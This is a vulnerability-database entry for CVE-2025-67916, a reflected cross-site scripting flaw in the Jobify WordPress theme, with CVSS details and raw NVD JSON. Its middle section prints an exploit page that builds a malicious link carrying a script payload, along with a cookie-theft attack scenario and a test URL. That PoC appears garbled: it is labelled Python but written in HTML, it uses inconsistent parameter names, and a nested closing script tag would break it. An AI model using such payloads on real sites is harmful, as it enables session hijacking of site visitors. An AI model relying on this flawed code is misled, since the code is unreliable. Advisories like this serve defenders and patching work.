Security Vulnerability Report
中文
CVE-2025-67916 CVSS 7.1 HIGH

CVE-2025-67916

Published: 2026-01-08 10:15:50
Last Modified: 2026-04-27 18:16:49

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Astoundify Jobify jobify allows Reflected XSS.This issue affects Jobify: from n/a through <= 4.3.0.

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Jobify <= 4.3.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-67916 Reflected XSS PoC for Jobify Theme --> <!-- This PoC demonstrates the reflected XSS vulnerability in Jobify theme --> <!-- Replace TARGET_URL with the vulnerable site URL --> <!DOCTYPE html> <html> <head> <title>CVE-2025-67916 PoC</title> </head> <body> <h2>CVE-2025-67916: Jobify Theme Reflected XSS</h2> <p>Click the link below to test the vulnerability:</p> <script> // Generate malicious URL with XSS payload const targetUrl = 'TARGET_URL'; const xssPayload = '<script>alert("XSS Vulnerability - CVE-2025-67916");document.cookie;</script>'; const maliciousUrl = targetUrl + '?search=' + encodeURIComponent(xssPayload); document.write('<a href="' + maliciousUrl + '" target="_blank">Malicious Link</a>'); </script> <h3>Attack Scenario:</h3> <ol> <li>Attacker crafts a URL with malicious XSS payload in search parameter</li> <li>Victim clicks the malicious link</li> <li>Server reflects the unsanitized input in response</li> <li>Malicious script executes in victim's browser</li> <li>Attacker steals session cookies or performs actions on behalf of victim</li> </ol> <h3>Manual Test URL Format:</h3> <pre>http://target-site.com/?s=<script>alert(document.domain)</script></pre> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67916", "sourceIdentifier": "[email protected]", "published": "2026-01-08T10:15:50.470", "lastModified": "2026-04-27T18:16:48.587", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Astoundify Jobify jobify allows Reflected XSS.This issue affects Jobify: from n/a through <= 4.3.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/jobify/vulnerability/wordpress-jobify-theme-4-3-0-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}